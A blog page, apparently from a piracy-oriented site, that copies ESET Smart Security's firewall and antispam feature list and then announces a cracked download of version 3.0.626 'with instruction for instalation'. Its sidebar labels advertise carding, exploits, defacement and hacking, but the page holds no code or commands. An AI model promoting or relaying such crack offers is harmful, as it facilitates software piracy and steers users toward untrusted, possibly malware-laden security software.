The personal firewall monitors all traffic between a protected computer and other computers in the network. ESET personal firewall contains advanced functions as listed below.

Low layer network communication scanning
? Network communication scanning on the Data Link Layer enables ESET Personal Firewall to overcome a variety of attacks that would otherwise be undetectable.

IPv6 support
? ESET Personal Firewall displays IPv6 addresses and allows users to create rules for them.
Executable file monitoring
? Monitoring changes in executable files in order to overcome infection. It is possible to allow file modification of signed applications.

File scanning integrated with HTTP and POP3
? Integrated file scanning into the HTTP and POP3 application protocols. Users are protected when browsing the Internet or downloading emails.

Intrusion Detection System
? Ability to recognize the character of network communication and various types of network attacks and an option to automatically ban such communication.

Interactive, Automatic or Policy-based mode support
? Users can select whether the firewall actions will be executed automatically, or if they want to set rules interactively. Communication in policy-based mode is handled according to rules predefined by the user or the network administrator.

Supersedes Integrated Windows Firewall
? Supersedes the Integrated Windows Firewall, it also interacts with the Windows Security Center so the user is always informed about his security status. ESET Smart Security installation turns off the windows firewall by default

Antispam
ESET Antispam filters unsolicited email and therefore increases the security and comfort of electronic communication.

Incoming Mail Scoring
? All Incoming mail is assigned a rating ranging from 0 (a message is not spam) to 100 (a message is spam), and transferred accordingly into the Junk Mail folder or into a custom folder created by the user. Parallel scanning of incoming emails is possible.

Supports a variety of scanning techniques
? Bayes analysis
? Rule-based scanning
? Global fingerprint database check

Full integration with email clients
? Antispam protection is available to users of Microsoft Outlook, Outlook Express and Windows Mail clients.

Manual spam selection is available
? There is an option to manually check / uncheck email as spam.

Download:
Eset smart security 3.0.626 Cracked 15368 days

With instruction for instalation

No pass!
esset nod 32
crack

Updates Via E-Mail

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST